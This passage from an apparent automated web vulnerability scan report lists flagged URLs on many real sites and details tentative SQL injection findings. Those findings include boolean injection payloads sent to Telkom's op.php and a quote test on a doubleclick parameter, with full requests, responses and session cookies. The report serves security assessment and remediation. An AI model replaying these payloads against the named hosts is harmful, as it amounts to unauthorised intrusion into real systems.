18.11. http://eastore.ea.com/integration/job/request/ShoppingCartService/ea/site/

18.12. http://fls.doubleclick.net/activityi

18.13. http://fls.doubleclick.net/activityi

18.14. http://fls.doubleclick.net/activityi

18.15. http://gan.doubleclick.net/gan_impression

18.16. http://googleads.g.doubleclick.net/pagead/ads

18.17. http://googleads.g.doubleclick.net/pagead/ads

18.18. http://googleads.g.doubleclick.net/pagead/ads

18.19. http://googleads.g.doubleclick.net/pagead/ads

18.20. http://googleads.g.doubleclick.net/pagead/ads

18.21. http://googleads.g.doubleclick.net/pagead/ads

18.22. http://googleads.g.doubleclick.net/pagead/ads

18.23. http://googleads.g.doubleclick.net/pagead/ads

18.24. http://itunes.apple.com/us/app/exxon-mobil-fuel-finder/id397136849

18.25. http://mediacdn.disqus.com/1308858010/build/system/disqus.js

18.26. http://mg.dt00.net/js/g/a/gamersdailynews.com.2930.js

18.27. http://store.origin.com/DRHM/store

18.28. http://store.origin.com/store

18.29. http://store.origin.com/store

18.30. http://videogamevoters.org/eacorp/

18.31. http://web-static.ea.com/atlas/sw-combine/1308169381/aa9b219f67624074aa6ae611eb06bda0.js

18.32. http://web.sa.mapquest.com/mobil1/

18.33. http://www.asiawebdirect.com/forms/portal-feedback.html

18.34. http://www.celebritycruises.com/specials/viewHTMLPromo.do

18.35. https://www.ea.com/profile/js/facebook.jsx

18.36. https://www.ea.com/profile/js/jquery_facebox.jsx

18.37. https://www.ea.com/profile/register

18.38. http://www.facebook.com/plugins/like.php

18.39. http://www.facebook.com/plugins/like.php

18.40. http://www.facebook.com/plugins/likebox.php

18.41. http://www.facebook.com/plugins/likebox.php

18.42. http://www.google.com/search

18.43. http://www.google.com/search

18.44. http://www.google.com/url

18.45. http://www.google.com/url

18.46. http://www.google.com/url

18.47. http://www.google.com/url

18.48. http://www.google.com/url

18.49. http://www.info.ea.com/

18.50. http://www.metlife.com/about/index.html

18.51. http://www.metlife.com/individual/employee-benefits/index.html

18.52. http://www.metlife.com/individual/insurance/disability-insurance/index.html

18.53. http://www.metlife.com/individual/insurance/life-insurance/hp-life-insurance-quote.html

18.54. http://www.metlife.com/wps/MCTridionWSProxy/TridionMCService/PageContent/metlife/individual/index.html

18.55. http://www.onlinecomcast.com/

18.56. http://www.phuket-travel.com/nightlife/fantasea.htm

18.57. http://www.phuket.com/andamanwhitebeach/

18.58. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

18.59. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

18.60. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

18.61. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

18.62. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

18.63. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

18.64. http://www.silobreaker.com/ShowWidget.aspx

19. Cross-domain script include

19.1. http://article.wn.com/view/2011/02/08/Spil_Games_Selects_Adyens_Internet_Payment_System_for_Global/

19.2. http://beta.telkom.co.id/

19.3. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html

19.4. http://beta.telkom.co.id/info-perusahaan/

19.5. http://beta.telkom.co.id/pojok-media/artikel-infokom/

19.6. http://beta.telkom.co.id/pojok-media/berita-telkom/

19.7. http://beta.telkom.co.id/pojok-media/siaran-pers/

19.8. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html

19.9. http://beta.telkom.co.id/products-services/index.html

19.10. http://beta.telkom.co.id/produk-layanan/

19.11. http://clicktoverify.truste.com/pvr.php

19.12. http://download1.parallels.com/favicon.ico

19.13. http://everquest2.com/free_to_play

19.14. http://fls.doubleclick.net/activityi

19.15. http://googleads.g.doubleclick.net/pagead/ads

19.16. http://googleads.g.doubleclick.net/pagead/ads

19.17. http://itunes.apple.com/us/app/exxon-mobil-fuel-finder/id397136849

19.18. http://listings.mapquest.com/apps/listing

19.19. http://newerforms.wn.com/form/ad_enquiry/

19.20. http://newerforms.wn.com/form/sitemap_feedback/

19.21. http://phuket.com/

19.22. http://r1-ads.ace.advertising.com/site=783617/size=728090/u=2/bnum=93673890/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.gamersdailynews.com%252Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html

19.23. http://store.origin.com/

19.24. http://store.origin.com/DRHM/store

19.25. http://store.origin.com/store

19.26. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800

19.27. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800

19.28. http://store.origin.com/store/ea/en_US/pd/ThemeID.718200/productID.201797000

19.29. http://store.origin.com/store/ea/home/

19.30. http://videogamevoters.org/eacorp/

19.31. http://videogamevoters.org/index.php/modal/sc-soon

19.32. http://videogamevoters.org/page/s/raiseyourvoice

19.33. http://web.sa.mapquest.com/mobil1/

19.34. http://www.asiawebdirect.com/forms/portal-feedback.html

19.35. http://www.citibank.com/favicon.ico

19.36. http://www.ea.com/

19.37. http://www.ea.com/1/product-eulas

19.38. https://www.ea.com/profile/register

19.39. http://www.facebook.com/login.php

19.40. http://www.facebook.com/plugins/like.php

19.41. http://www.facebook.com/plugins/like.php

19.42. http://www.facebook.com/plugins/likebox.php

19.43. http://www.metlife.com/about/index.html

19.44. http://www.metlife.com/individual/employee-benefits/index.html

19.45. http://www.metlife.com/individual/insurance/disability-insurance/index.html

19.46. http://www.metlife.com/individual/insurance/life-insurance/hp-life-insurance-quote.html

19.47. http://www.onlinecomcast.com/

19.48. http://www.phuket-travel.com/

19.49. http://www.phuket-travel.com/nightlife/fantasea.htm

19.50. http://www.phuket-travel.com/premium-packages/index.htm

19.51. http://www.phuket.com/andamanwhitebeach/

19.52. http://www.phuket.com/islands/index.htm

19.53. http://www.silobreaker.com/ShowWidget.aspx

19.54. http://www.silobreaker.com/spil-games-selects-adyens-internet-payment-system-for-global-social-5_2264343625376727174

19.55. http://www.telkomsel.com/product/blackberry/550-Paket-BlackBerry-Pilihan.html

19.56. http://www.telkomsel.com/product/blackberry/undefined

20. File upload functionality

20.1. http://mediacdn.disqus.com/1308858010/build/system/upload.html

20.2. http://videogamevoters.org/page/s/raiseyourvoice

21. TRACE method is enabled

21.1. http://beta.telkom.co.id/

21.2. http://d1.openx.org/

21.3. http://sales.swsoft.com/

21.4. https://shop.marketplace.parallels.com/

21.5. https://softlayer.parallelsmarketplace.com/

21.6. http://www.addthis.com/

21.7. http://www.parallels.com/

22. Email addresses disclosed

22.1. http://beta.telkom.co.id/info-perusahaan/

22.2. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html

22.3. http://beta.telkom.co.id/products-services/index.html

22.4. http://beta.telkom.co.id/produk-layanan/

22.5. http://beta.telkom.co.id/theme/Standard/js/curvycorners.src.js

22.6. http://cdn.wn.com/or/js/jquery.hoverIntent.minified.js

22.7. http://clicktoverify.truste.com/common/css/validate2_1_big.css

22.8. http://clicktoverify.truste.com/css/styles.css

22.9. http://everquest2.com/_themes/global/javascript/validation/jquery_validationEngine.js

22.10. http://everquest2.com/javascript/s_code.js

22.11. http://hotels.asiawebdirect.com/scripts/s_code.js

22.12. http://legal.ea.com/legal/legal.jsp

22.13. http://mediacdn.disqus.com/1308858010/build/system/disqus.js

22.14. http://newerforms.wn.com/media/js/date.js

22.15. http://newsletter.asiawebdirect.com/inxmail3/subscribe.jsp

22.16. https://softlayer.parallelsmarketplace.com/store/conf/86/lang/en.js

22.17. https://softlayer.parallelsmarketplace.com/store/index.php

22.18. http://static.asiawebdirect.com/premium/js/s_code.js

22.19. http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/

22.20. http://twitter.com/account/bootstrap_data

22.21. http://videogamevoters.org/page/-/js/vgvn-source.js

22.22. https://www.ea.com/profile/js/jquery_facebox.jsx

22.23. http://www.epm.com.co/epm/web/_admincom/admincom_pye_bienvenida.html

22.24. http://www.epm.com.co/epm/web/_admincom/banner19.html

22.25. http://www.epm.com.co/epm/web/_assets/code/mainComponentController.js

22.26. http://www.epm.com.co/epm/web/_assets/code/mtc_rev1.js

22.27. http://www.epm.com.co/epm/web/_assets/code/multicolumna.js

22.28. http://www.epm.com.co/epm/web/_assets/code/noticiasgrupo.js

22.29. http://www.epm.com.co/epm/web/_assets/code/variables_generales.cfg.js

22.30. http://www.fuelprogress.com/USA-English/GFM/Microsite/seo/js/jquery.pngFix.pack.fixed.js

22.31. http://www.gamersdailynews.com/js/lightbox.js

22.32. http://www.gamersdailynews.com/js/prototype.js

22.33. http://www.metlife.com/individual/insurance/disability-insurance/index.html

22.34. http://www.metlife.com/individual/insurance/life-insurance/hp-life-insurance-quote.html

22.35. http://www.metlife.com/wps/MCTridionWSProxy/TridionMCService/PageContent/metlife/individual/index.html

22.36. http://www.phuket-travel.com/premium-packages/index.htm

22.37. http://www.phuket-travel.com/scripts/s_code.js

22.38. http://www.pogo.com/v/FSMQBg/include/js/shared/markup2.js

22.39. http://www.pymnts.com/mysite/javascript/main.js

22.40. http://www.pymnts.com/sapphire/thirdparty/prototype/prototype.js

22.41. http://www.telkomsel.com/media/facebox/facebox.js

22.42. http://www.xobni.com/javascripts/jquery.base64.min.js

23. Private IP addresses disclosed

23.1. http://api.facebook.com/restserver.php

23.2. http://api.facebook.com/restserver.php

23.3. http://connect.facebook.net/en_GB/all.js

23.4. http://connect.facebook.net/en_US/all.js

23.5. http://download1.parallels.com/PPSMBE/10.0.0/Doc/en-US/online/parallels-panel-smb-administrator-guide/parallels-panel-smb-user-guide/63583.htm

23.6. http://static.ak.fbcdn.net/connect.php/css/share-button-css

23.7. http://static.ak.fbcdn.net/connect.php/js/FB.Share

23.8. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.9. http://static.ak.fbcdn.net/images/connect_sprite.png

23.10. http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/ulcvK428paE.js

23.11. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/OqB3HmdoAE3.css

23.12. http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/i_oIVTKMYsL.png

23.13. http://web-static.ea.com/us/portal/js/ea/Framework.js

23.14. http://www.facebook.com/extern/login_status.php

23.15. http://www.facebook.com/extern/login_status.php

23.16. http://www.facebook.com/extern/login_status.php

23.17. http://www.facebook.com/extern/login_status.php

23.18. http://www.facebook.com/extern/login_status.php

23.19. http://www.facebook.com/login.php

23.20. http://www.facebook.com/plugins/like.php

23.21. http://www.facebook.com/plugins/like.php

23.22. http://www.facebook.com/plugins/like.php

23.23. http://www.facebook.com/plugins/like.php

23.24. http://www.facebook.com/plugins/like.php

23.25. http://www.facebook.com/plugins/like.php

23.26. http://www.facebook.com/plugins/like.php

23.27. http://www.facebook.com/plugins/like.php

23.28. http://www.facebook.com/plugins/like.php

23.29. http://www.facebook.com/plugins/likebox.php

23.30. http://www.facebook.com/plugins/likebox.php

23.31. http://www.facebook.com/sharer/sharer.php

23.32. http://www.google.com/sdch/vD843DpA.dct

23.33. http://www.metlife.com/system/css/components_home.css

23.34. http://www.metlife.com/system/css/global.css

23.35. http://www.metlife.com/system/js/vendor/optimost.js

24. Credit card numbers disclosed

24.1. https://softlayer.parallelsmarketplace.com/store/conf/86/lang/en.js

24.2. https://softlayer.parallelsmarketplace.com/store/index.php

25. Robots.txt file

25.1. http://609167.r.msn.com/

25.2. http://a.netmng.com/

25.3. http://ad.doubleclick.net/click

25.4. http://ad.yieldmanager.com/pixel

25.5. http://adclick.g.doubleclick.net/aclk

25.6. http://apnxscm.ac3.msn.com:81/CACMSH.ashx

25.7. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html

25.8. http://d1.openx.org/afr.php

25.9. http://display.digitalriver.com/

25.10. http://fls.doubleclick.net/activityi

25.11. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1034849195/

25.12. http://l.addthiscdn.com/live/t00/250lo.gif

25.13. http://rcci.122.2o7.net/b/ss/celebritycruiseprod/1/H.22.1/s6910370561759

25.14. http://s7.addthis.com/js/250/addthis_widget.js

25.15. http://segment-pixel.invitemedia.com/pixel

25.16. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.17. http://swsoft.122.2o7.net/b/ss/swsdev/1/H.21/s08157070665620

25.18. http://tracking.searchmarketing.com/welcome.asp

25.19. http://wotifcom.112.2o7.net/b/ss/wotifcom-awd-global-prd,wotifcom-awd-phuket-prd/1/H.17/s69540000788401

25.20. http://www.addthis.com/bookmark.php

25.21. http://www.celebritycruises.com/iw-cc/base/styles/iw.css

25.22. http://www.epm.com.co/

25.23. http://www.facebook.com/sharer/sharer.php

25.24. http://www.google-analytics.com/siteopt.js

25.25. http://www.googleadservices.com/pagead/conversion/1034849195/

25.26. http://www.parallels.com/en/store/plesk/win/addons/

26. Cacheable HTTPS response

26.1. https://customersupport.ea.com/loginapp/cp/login.do

26.2. https://shop.marketplace.parallels.com/http/blank.html

26.3. https://softlayer.parallelsmarketplace.com/store/design/images/favicon.ico

26.4. https://store.playstation.com/favicon.ico

26.5. https://www.ea.com/profile/register

27. Multiple content types specified

27.1. http://exxon.com/Images/lightview/close_large.png

27.2. http://exxon.com/Images/lightview/close_small.png

27.3. http://exxon.com/Images/lightview/controller_prev.png

27.4. http://exxon.com/Images/lightview/controller_slideshow_stop.png

27.5. http://exxon.com/Images/lightview/inner_next.png

27.6. http://exxon.com/Images/lightview/inner_prev.png

27.7. http://exxon.com/Images/lightview/inner_slideshow_stop.png

27.8. http://exxon.com/Images/lightview/loading.gif

27.9. http://exxon.com/Images/lightview/prev.png

27.10. http://exxon.com/Images/lightview/topclose.png

27.11. http://exxon.com/favicon.ico

27.12. http://www.fuelprogress.com/favicon.ico

28. HTML does not specify charset

28.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

28.2. http://ads.pointroll.com/PortalServe/

28.3. http://beta.telkom.co.id/op.php

28.4. http://cdn.at.atwola.com/_media/uac/tcodeqt.html

28.5. http://content.pulse360.com/43AE06D6-306A-11E0-9FBF-51F23F5BF877

28.6. http://content.pulse360.com/F81E71FC-348C-11E0-8455-C9C5E4064C68

28.7. http://display.digitalriver.com/

28.8. http://ds.addthis.com/red/psi/sites/beta.telkom.co.id/p.json

28.9. http://fls.doubleclick.net/activityi

28.10. http://mediacdn.disqus.com/1308858010/build/system/def.html

28.11. http://mediacdn.disqus.com/1308858010/build/system/reply.html

28.12. http://mediacdn.disqus.com/1308858010/build/system/upload.html

28.13. https://softlayer.parallelsmarketplace.com/design/css/spin.css

28.14. http://web.sa.mapquest.com/Images/spacer.gif

28.15. http://web.sa.mapquest.com/favicon.ico

28.16. http://www.asiawebdirect.com/forms/portal-feedback.html

28.17. http://www.citibank.com/favicon.ico

28.18. http://www.epm.com.co/epm/web/_admincom/diccionario/_admincom_dict_lista.html

28.19. http://www.epm.com.co/epm/web/_admincom/menuinstitucional2.html

28.20. http://www.epm.com.co/epm/web/_assets/code/redes_sociales.cfg.html

28.21. http://www.exxonmobilstations.com/favicon.ico

28.22. http://www.mapquest.com/cdn/_uac/adpage.htm

28.23. http://www.metlife.com/assets/cao/iws/hp/ind/hero/metricsblank.gif

28.24. http://www.metlife.com/wps/proxy/MCPremiumQuoteWS/MCHealthClassOption

28.25. http://www.metlife.com/wps/proxy/MCPremiumQuoteWS/MCPremiumQuote

28.26. http://www.phuket-travel.com/checkavailability/currency.php

28.27. http://www.phuket-travel.com/reserve/indexShort.php

28.28. http://www.phuket-travel.com/scripts/scripts.htm

29. Content type incorrectly stated

29.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

29.2. http://a.netmng.com/

29.3. http://a3.twimg.com/profile_images/58727890/PIA08370_normal.png

29.4. http://api.twitter.com/1/urls/resolve.json

29.5. http://ar.voicefive.com/b/rc.pli

29.6. http://cdn.wn.com/or/images/icons/edit24x24.png

29.7. http://cdn.wn.com/or/js/hyphenator_en-2.5.0.min.js

29.8. http://content.pulse360.com/43AE06D6-306A-11E0-9FBF-51F23F5BF877

29.9. http://content.pulse360.com/F81E71FC-348C-11E0-8455-C9C5E4064C68

29.10. http://display.digitalriver.com/

29.11. http://drh.img.digitalriver.com/DRHM/Storefront/Site/ea/pb/images/Origin_favicon.ico

29.12. http://drh2.img.digitalriver.com/favicon.ico

29.13. http://drh2.img.digitalriver.com/store

29.14. http://everquest2.com/favicon.ico

29.15. http://images.apple.com/global/nav/scripts/globalnav.js

29.16. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

29.17. http://media.celebritycruises.com/celebrity/content/en_US/images/specials/special_promotions/ports_header.jpg

29.18. https://softlayer.parallelsmarketplace.com/store/design/images/favicon.ico

29.19. https://softlayer.parallelsmarketplace.com/store/index.php

29.20. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll

29.21. http://static.asiawebdirect.com/m/phuket/portals/phuket-com/homepage/islands/allParagraphs/0117/image/222

29.22. http://store.origin.com/DRHM/Storefront/Site/ea/pb/images/EA_favicon.ico

29.23. http://store.origin.com/store

29.24. https://store.playstation.com/favicon.ico

29.25. http://support.ea.com/ci/ajaxCustom/getHierValues/session/L3RpbWUvMTMwODkyMzAzMS9zaWQvOVpUQ2xqeGs%3D

29.26. http://support.ea.com/ci/browserSearch/desc/http%3A%2F%2Fsupport.ea.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/%2Feuf%2Fassets%2Fimages%2Ficons%2Ffavicon_browserSearchPlugin.ico

29.27. http://support.ea.com/euf/rightnow/optimized/1308735671/themes/ea_com/images/ico_support_home.png

29.28. http://twitter.com/favorites/xobni.json

29.29. http://v360.mqcdn.com/sv/ac/coverages.mercator.jsonp

29.30. http://v360.mqcdn.com/sv/ac/styling.mercator.jsonp

29.31. http://videogamevoters.org/ext/jquery/jquery-bsdNoConflict.js

29.32. http://videogamevoters.org/page/-/js/sys_regular.js

29.33. http://videogamevoters.org/page/spud

29.34. http://videogamevoters.org/utils/locale/load_locale.ajax.php

29.35. http://web-static.ea.com/us/portal/images/icon_downloads.png

29.36. http://web-static.ea.com/us/portal/images/icon_music.png

29.37. http://web-static.ea.com/us/portal/images/icon_photo.png

29.38. http://web-static.ea.com/us/portal/images/icon_video.png

29.39. http://www.asiawebdirect.com/customer/enquiry/template/en/lang_txt.js

29.40. http://www.ea.com/json/user-menu

29.41. http://www.epm.com.co/epm/web/_admincom/diccionario/_admincom_dict_lista.html

29.42. http://www.epm.com.co/epm/web/_admincom/menuinstitucional2.html

29.43. http://www.epm.com.co/epm/web/_assets/code/multihistorias.js

29.44. http://www.epm.com.co/epm/web/_assets/code/redes_sociales.cfg.html

29.45. http://www.facebook.com/extern/login_status.php

29.46. http://www.gamersdailynews.com/images/nextgen_green/header_split.jpg

29.47. http://www.gamersdailynews.com/images/nextgen_green/rate.jpg

29.48. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg

29.49. http://www.metlife.com/assets/campaigns/search/termlife/hp/form-tile.png

29.50. http://www.metlife.com/assets/ib/insurance/disability/individual-disability-calc.jpg

29.51. http://www.metlife.com/assets/ib/insurance/disability/quiz-banner.jpg

29.52. http://www.metlife.com/system/assets/favicon.ico

29.53. http://www.metlife.com/system/css/RRvalidation.gif

29.54. http://www.metlife.com/wps/proxy/MCPremiumQuoteWS/MCHealthClassOption

29.55. http://www.metlife.com/wps/proxy/MCPremiumQuoteWS/MCPremiumQuote

29.56. http://www.parallels.com/r/css/import.css

29.57. http://www.phuket-travel.com/reserve/indexShort.php

29.58. http://www.phuket-travel.com/scripts/scripts.htm

29.59. http://www.pogo.com/include/css/pogo.css

29.60. http://www.pymnts.com/favicon.ico

29.61. http://www.xobni.com/media/fonts/Chunkfive-webfont.woff

30. Content type is not specified

30.1. http://listings.mapquest.com/apps/images/favicon_mq.ico

30.2. http://www.pogo.com/favicon.ico

31. SSL certificate

31.1. https://shop.marketplace.parallels.com/

31.2. https://softlayer.parallelsmarketplace.com/



1. SQL injection
There are 3 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://beta.telkom.co.id/op.php [icid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://beta.telkom.co.id
Path:   /op.php

Issue detail

The icid parameter appears to be vulnerable to SQL injection attacks. The payloads 15615320%20or%201%3d1--%20 and 15615320%20or%201%3d2--%20 were each submitted in the icid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /op.php?icid=3715615320%20or%201%3d1--%20 HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/produk-layanan/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.3.10.1308921355

Response 1

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:17:49 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25708

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
       <html>
       <head>
        <meta http-equiv="content-type" content="text/html; charset=windows-1250">
        <link href="wdefault.css" rel="s
...[SNIP]...
<body>

<p class="texttitle01"><strong><font color="#00ccff">DESKRIPSI</font></strong> </p>
<p><span class="copy01">Merupakan layanan komunikasi jarak jauh antar pelanggan yang masih dalam satu wilayah negara. Pada umumnya, pelanggan-pelanggan tersebut berada dalam wilayah kode area yang berbeda.</span></p>
<p class="texttitle01"><strong><font color="#00ccff"></font></strong></p>
<p class="texttitle01"><strong><font color="#00ccff">FITUR &amp; TARIF</font></strong>&nbsp;&nbsp;&nbsp;</p>
<p><strong>Tabel Tarif Percakapan (berlaku sejak&nbsp;8 April 2008, pukul 00.00 waktu setempat) </strong></p>
<p><strong>Tarif Dasar SLJJ PSTN ke Mobile/Seluler</strong></p>
<table cellpadding="0" style="WIDTH: 536px; HEIGHT: 914px">
<tbody>
<tr class="textmenu01" style="COLOR: rgb(51,102,153)">
<td width="631" colspan="6">
<p align="center"><strong>Hari Senin s.d Sabtu </strong></p>
</td>
</tr>
<tr bgcolor="#52b3e5" class="textmenu01">
<td width="118">
<p align="center"><span class="texttitle02"><strong>Jarak (Km) </strong></span></p>
</td>
<td width="153">
<p align="center"><span class="texttitle02"><strong>Time Band </strong></span></p>
</td>
<td width="88">
<p align="center"><span class="texttitle02"><strong>Lama </strong></span></p>
</td>
<td width="94">
<p align="center"><span class="texttitle02"><strong>Baru </strong></span></p>
</td>
</tr>
<tr bgcolor="#52b3e5" class="textmenu01">
<td>&nbsp;</td>
<td>&nbsp;</td>
<td width="88">
<p align="center"><span class="texttitle02">(Rp.)/20 dtk&nbsp;</span></p>
</td>
<td width="94">
<p align="center"><span class="texttitle02">(Rp.)/20 dtk</span></p>
</td>
</tr>
<tr bgcolor="#d8e
...[SNIP]...

Request 2

GET /op.php?icid=3715615320%20or%201%3d2--%20 HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/produk-layanan/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.3.10.1308921355

Response 2

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:17:51 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 435
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
       <html>
       <head>
        <meta http-equiv="content-type" content="text/html; charset=windows-1250">
        <link href="wdefault.css" rel="s
...[SNIP]...
<body>

       </BODY>
       </HTML>

1.2. http://googleads.g.doubleclick.net/pagead/ads [bpp parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The bpp parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the bpp parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-4422256122899399&output=html&h=600&slotname=5812067516&w=160&lmt=1265919214&flash=10.3.181&url=http%3A%2F%2Fwww.phuket.com%2Fislands%2Findex.htm&dt=1308921644698&bpp=3'&shv=r20110615&jsv=r20110616&correlator=1308921644759&frm=4&adk=1526460535&ga_vid=1300501793.1308921638&ga_sid=1308921638&ga_hid=303218268&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&ref=http%3A%2F%2Fphuket.com%2F&fu=0&ifi=1&dtd=74&xpc=9Mga7JBlkD&p=http%3A//www.phuket.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:29:26 GMT
Server: cafe
Cache-Control: private
Content-Length: 9000
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
